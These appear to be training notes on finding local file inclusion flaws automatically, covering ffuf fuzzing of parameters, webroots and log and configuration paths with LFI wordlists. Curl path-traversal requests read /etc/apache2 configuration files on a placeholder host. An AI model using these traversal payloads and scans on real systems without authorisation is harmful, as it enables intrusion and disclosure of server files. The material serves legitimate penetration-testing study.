Skip to content

Automated Scanning

  • use of automatic methods to find LFI

Fuzzing Parameters

  • Fuzzing for GET parameters
    • ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
  • Once we identify an exposed parameter that isn't linked to any forms we tested, we can perform all of the LFI tests discussed in this module. This is not unique to LFI vulnerabilities but also applies to most web vulnerabilities discussed in other modules, as exposed parameters may be vulnerable to any other vulnerability as well.
  • Tip: For a more precise scan, we can limit our scan to the most popular LFI parameters found on this link.

LFI wordlists

  • https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
  • https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
  • ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

Fuzzing server files

  • Server webroot pathserver configurations file, and server logs - good to find these files

Server webroot

  • https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt - LINUX
  • https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt - WINDOWS
  • ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
  • As we can see, the scan did indeed identify the correct webroot path at (/var/www/html/). We may also use the same LFI-Jhaddix.txt wordlist we used earlier, as it also contains various payloads that may reveal the webroot. If this does not help us in identifying the webroot, then our best choice would be to read the server configurations, as they tend to contain the webroot and other important information, as we'll see next.

Server Logs/Configurations

  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
  • https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
  • ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
  • The scan returned results that the LFI-Jhaddix file couldnt
  • Next, we try to obtain the configuration file
    • curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf
  • Now, we do see the paths but an environment variable is used as a prefix
    • curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars
    • Find the variable to get the complete value for above paths.

LFI tools